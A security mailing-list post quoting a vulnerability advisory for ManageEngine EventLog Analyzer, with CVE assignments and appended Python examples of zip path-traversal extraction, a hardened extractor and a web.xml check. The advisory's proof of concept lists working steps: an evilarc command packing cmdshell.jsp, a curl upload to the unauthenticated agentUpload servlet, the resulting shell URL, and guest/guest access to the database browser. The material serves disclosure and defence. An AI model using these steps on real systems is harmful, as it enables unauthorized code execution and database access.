On 3 September 2014 07:23, Pedro Ribeiro <[email protected]> wrote:
> On 31 August 2014 16:39, Advisories <[email protected]> wrote:
>> Mogwai Security Advisory MSA-2014-01
>> ----------------------------------------------------------------------
>> Title:             ManageEngine EventLog Analyzer Multiple Vulnerabilities
>> Product:           ManageEngine EventLog Analyzer
>> Affected versions: EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
>> Impact:            critical
>> Remote:            yes
>> Product link:      http://www.manageengine.com/products/eventlog/
>> Reported:          18/04/2013
>> by:                Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
>>
>>
>> Vendor's Description of the Software:
>> ----------------------------------------------------------------------
>> EventLog Analyzer provides the most cost-effective Security Information and
>> Event Management (SIEM) software on the market. Using this Log Analyzer
>> software, organizations can automate the entire process of managing terabytes
>> of machine generated logs by collecting, analyzing, searching, reporting,
>> and archiving from one central location. This event log analyzer software
>> helps to mitigate internal threats, conduct log forensics analysis, monitor
>> privileged users and comply with different compliance regulatory bodies
>> by intelligently analyzing your logs and instantly generating a variety of
>> reports like user activity reports, regulatory compliance reports,
>> historical trend reports, and more.
>>
>>
>> Business recommendation:
>> ----------------------------------------------------------------------
>> During a penetration test, multiple vulnerabilities have been identified
>> that are based on severe design/implementation flaws in the application.
>> It is highly recommended not to use this software until a thorough
>> security review has been performed by security professionals and all
>> identified issues have been resolved.
>>
>>
>> Vulnerability description:
>> ----------------------------------------------------------------------
>> 1) Unauthenticated remote code execution
>> ME EventLog Analyzer contains an "agentUpload" servlet which is used by Agents
>> to send log data as zip files to the central server. Files can be uploaded
>> without authentication and are stored/decompressed in the "data" subdirectory.
>>
>> As the decompress procedure is handling the file names in the ZIP file in an
>> insecure way it is possible to store files in the web root of the server. This
>> can be used to upload/execute code with the rights of the application server.
>>
>> 2) Authorization issues
>> The EventLog Analyzer web interface does not check if an authenticated user has
>> sufficient permissions to access certain parts of the application. A low
>> privileged user (for example guest) can therefore access critical sections of
>> the web interface by directly calling the corresponding URLs. This can be used
>> to access the database browser of the application which gives the attacker
>> full access to the database.
>>
>>
>> Proof of concept:
>> ----------------------------------------------------------------------
>> 1) Unauthenticated remote code execution
>>
>> - Create a malicious zip archive with the help of evilarc[1]
>>   evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
>> - Send the malicious archive to the agentUpload servlet
>>   curl -F "[email protected]" http://172.16.37.131:8400/agentUpload
>> - Enjoy your shell
>>   http://172.16.37.131:8400/cmdshell.jsp
>>
>> A working Metasploit module will be released next week.
>>
>>
>> 2) Authorization issues
>> - Log in as a low privileged user (for example guest/guest)
>> - Directly call the URL of the database browser
>>   http://xxx.xxx.xxx.xxx:8400/event/runQuery.do
>>
>>
>> Vulnerable / tested versions:
>> ----------------------------------------------------------------------
>> EventLog Analyzer 8.2 (Build 8020) (Windows)
>> EventLog Analyzer 8.2 (Build 8020) (Linux)
>> EventLog Analyzer 9.0 (Build 9002) (Windows)
>> EventLog Analyzer 9.0 (Build 9002) (Linux)
>>
>> Other versions might also be vulnerable.
>>
>>
>> Disclosure timeline:
>> ----------------------------------------------------------------------
>> 14/04/2013: Vulnerability discovery
>> 18/04/2013: Informed vendor via ManageEngine Security Response Center (MESRC)
>>             Form
>> 23/04/2013: Second try to contact MESRC, as we didn't receive any response
>>             from the first try.
>> 23/04/2013: Response from vendor, they wait on some feedback from the
>>             development team
>> 10/05/2013: Response from vendor, saying that this is rather an issue than a
>>             vulnerability, will fix it anyway
>> 13/05/2013: Technical details including a working proof of concept sent to
>>             ManageEngine.
>> 13/05/2013: Vendor response, saying that they forward it to the development
>>             team
>> 24/05/2013: Vendor response, saying that they will fix it in 2013 as they are
>>             "tightly scheduled on other priorities"
>> 24/05/2013: Response from us, asking if we will be informed when the
>>             vulnerability is fixed
>> 28/05/2013: Response from ManageEngine, saying that we must subscribe to their
>>             newsletter for release information
>> 05/09/2013: Verification that exploit is still working with the current
>>             version
>> 30/08/2014: Verification that exploit is still working with the current
>>             version
>> 31/08/2014: Public release
>>
>> Solution:
>> ----------------------------------------------------------------------
>> No known solution
>>
>> Workaround:
>> ----------------------------------------------------------------------
>> 1) Unauthenticated remote code execution
>> If agents are not used to collect log information, access to the servlet
>> can be disabled by commenting out the following lines in the web.xml file
>> (webapps/event/WEB-INF/web.xml) and restarting the service.
>>
>> <servlet>
>>   <servlet-name>agentUpload</servlet-name>
>>   <servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
>> </servlet>
>>
>> <servlet-mapping>
>>   <servlet-name>agentUpload</servlet-name>
>>   <url-pattern>/agentUpload</url-pattern>
>> </servlet-mapping>
>>
>> 2) Authorization issues
>> No workaround, reduce the attack surface by disabling unused low privileged
>> accounts like "guest".
>>
>>
>> Advisory URL:
>> ----------------------------------------------------------------------
>> https://www.mogwaisecurity.de/en/lab/advisories/
>>
>>
>> References
>> ----------------------------------------------------------------------
>> [1] evilarc
>>     https://github.com/ptoomey3/evilarc
>>
>> ----------------------------------------------------------------------
>> Mogwai, IT-Sicherheitsberatung Muench
>> Steinhoevelstrasse 2/2
>> 89075 Ulm (Germany)
>>
>> [email protected]
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> http://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
>
> MITRE have assigned CVE-2014-6037 for this issue.
>
> Regards,
> Pedro

The CVE above is for issue 1) Unauthenticated remote code execution / file upload
via insecure path handling. MITRE has also assigned CVE-2014-6043 for issue 2)
Authorization issues.

Regards,
Pedro

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
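The archive-name traversal behind issue 1) (CVE-2014-6037), worked through in Python as an added example that is not part of the advisory, the Metasploit module or the vendor's code. It builds in memory the kind of archive evilarc produces for `-d 2 -o unix -p webapps/event cmdshell.jsp` (a member named `../../webapps/event/cmdshell.jsp`), runs it through an extractor that joins member names onto the upload directory the way the advisory says the servlet does, and then through a hardened extractor that resolves every member path and refuses anything that does not stay inside the destination. The directory layout (uploads unpacked two levels below the install root, web root at `webapps/event`), the payload bytes and the benign log file name are constructed assumptions; the servlet's real extraction code and on-disk layout are not on the page.

```python
from __future__ import annotations

import io
import os
import tempfile
import zipfile
from pathlib import Path

# Constructed member name in the shape evilarc emits for "-d 2 -o unix -p
# webapps/event cmdshell.jsp": two "../" components, then the path under the
# web root. Assumption: uploads are unpacked two levels below the install
# root, so two "../" reach that root. The real layout is not on the page.
TRAVERSAL_NAME = "../../webapps/event/cmdshell.jsp"
# Constructed placeholder; stands in for cmdshell.jsp, not a real shell.
PAYLOAD = b"<%-- constructed placeholder standing in for cmdshell.jsp --%>"


def build_zip(member_name: str, payload: bytes) -> bytes:
    """Build an archive in memory whose single member carries member_name.
    zipfile stores the name verbatim, so "../" components survive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


def extract_unsafe(zip_bytes: bytes, dest: Path) -> list[Path]:
    """The flaw the advisory describes: the member name is joined onto the
    destination without normalisation, so ".." climbs out of it.
    (zipfile.extractall() strips ".." itself, hence the manual join.)"""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = Path(os.path.join(str(dest), info.filename))
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.resolve())
    return written


def member_is_contained(base: Path, name: str) -> bool:
    """True only if member `name`, unpacked under `base`, lands strictly
    inside base. Absolute names, drive letters and backslashes are rejected
    outright; everything else is resolved and compared against base."""
    if name.startswith("/") or "\\" in name or (len(name) > 1 and name[1] == ":"):
        return False
    base = base.resolve()
    return base in (base / name).resolve().parents


def extract_safe(zip_bytes: bytes, dest: Path) -> list[Path]:
    """Hardened extraction: refuse the whole archive on the first member that
    would escape dest, rather than silently skipping or rewriting it."""
    base = dest.resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not member_is_contained(base, info.filename):
                raise ValueError(f"path traversal rejected: {info.filename!r}")
            if info.is_dir():
                continue
            target = (base / info.filename).resolve()
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def run_demo() -> dict:
    """Lay out <root>/data/agent (upload dir) and <root>/webapps/event (web
    root) in a scratch directory, feed the traversal archive to both
    extractors, then a benign archive to the safe one, and report results."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        upload_dir = root / "data" / "agent"
        web_root = root / "webapps" / "event"
        upload_dir.mkdir(parents=True)
        web_root.mkdir(parents=True)

        evil = build_zip(TRAVERSAL_NAME, PAYLOAD)
        unsafe_paths = extract_unsafe(evil, upload_dir)
        landed = (web_root / "cmdshell.jsp").read_bytes() == PAYLOAD

        try:
            extract_safe(evil, upload_dir)
            rejected = False
        except ValueError:
            rejected = True

        # Constructed benign agent upload: a log file under a host directory.
        benign = build_zip("host1/security.log", b"constructed log line\n")
        benign_paths = extract_safe(benign, upload_dir)

        return {
            "unsafe_wrote": [str(p.relative_to(root)) for p in unsafe_paths],
            "payload_in_webroot": landed,
            "safe_rejected_traversal": rejected,
            "benign_wrote": [str(p.relative_to(root)) for p in benign_paths],
        }


if __name__ == "__main__":
    print(run_demo())
```

The containment test is done on the resolved path, not on the string: a check that merely looks for `../` misses names such as `foo/../../x` after the container's own normalisation, and a check that strips `..` silently changes where the file lands. Rejecting the whole archive on the first bad member is the right failure mode for an unauthenticated upload endpoint.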
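A check for the web.xml workaround, as an added example that is not from the advisory or the vendor: it parses the descriptor namespace-agnostically and reports every url-pattern that still routes to the UploadHandlerServlet class. Matching is by class rather than by the name "agentUpload", so a renamed servlet declaration is still caught. The three inline descriptors are constructed fragments in the standard Servlet 2.5 shape carrying only the element values quoted in the advisory; the real `webapps/event/WEB-INF/web.xml` is much longer and is not on the page.

```python
import xml.etree.ElementTree as ET

UPLOAD_SERVLET_CLASS = "com.adventnet.sa.agent.UploadHandlerServlet"

# Constructed fragment: the servlet and mapping elements the workaround says
# to comment out, as they would sit inside a Servlet 2.5 descriptor.
WEB_XML_LIVE = """
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>agentUpload</servlet-name>
    <servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>agentUpload</servlet-name>
    <url-pattern>/agentUpload</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Constructed: the same fragment with the workaround applied.
WEB_XML_DISABLED = """
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <!--
  <servlet>
    <servlet-name>agentUpload</servlet-name>
    <servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
  </servlet>
  -->
  <!--
  <servlet-mapping>
    <servlet-name>agentUpload</servlet-name>
    <url-pattern>/agentUpload</url-pattern>
  </servlet-mapping>
  -->
</web-app>
"""

# Constructed: the servlet declared under a different name and URL; a check
# keyed on the literal name "agentUpload" would miss this one.
WEB_XML_RENAMED = """
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <servlet>
    <servlet-name>uploader</servlet-name>
    <servlet-class>com.adventnet.sa.agent.UploadHandlerServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>uploader</servlet-name>
    <url-pattern>/upload</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace from a tag: "{ns}servlet" -> "servlet"."""
    return tag.rsplit("}", 1)[-1]


def _fields(el) -> dict:
    """Map each child's local tag name to its stripped text."""
    return {_local(c.tag): (c.text or "").strip() for c in el}


def upload_servlet_exposure(web_xml: str, servlet_class: str = UPLOAD_SERVLET_CLASS) -> dict:
    """Return the servlet names bound to servlet_class and every url-pattern
    that maps to one of them. Commented-out elements never reach the parser,
    which is exactly what the workaround relies on."""
    root = ET.fromstring(web_xml)
    names = {
        _fields(el).get("servlet-name")
        for el in root
        if _local(el.tag) == "servlet" and _fields(el).get("servlet-class") == servlet_class
    }
    patterns = []
    for el in root:
        if _local(el.tag) != "servlet-mapping":
            continue
        if _fields(el).get("servlet-name") not in names:
            continue
        # A mapping may carry several url-pattern children; keep all of them.
        patterns += [(c.text or "").strip() for c in el if _local(c.tag) == "url-pattern"]
    return {
        "servlet_names": sorted(n for n in names if n),
        "url_patterns": patterns,
        "exposed": bool(patterns),
    }


if __name__ == "__main__":
    for label, doc in [("live", WEB_XML_LIVE), ("disabled", WEB_XML_DISABLED), ("renamed", WEB_XML_RENAMED)]:
        print(label, upload_servlet_exposure(doc))
```

Against a real install, pass the contents of `webapps/event/WEB-INF/web.xml` to `upload_servlet_exposure()` after the service restart; an empty `url_patterns` list is the pass condition. A servlet that is still declared but no longer mapped is not reachable by URL, so only the mappings decide exposure.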
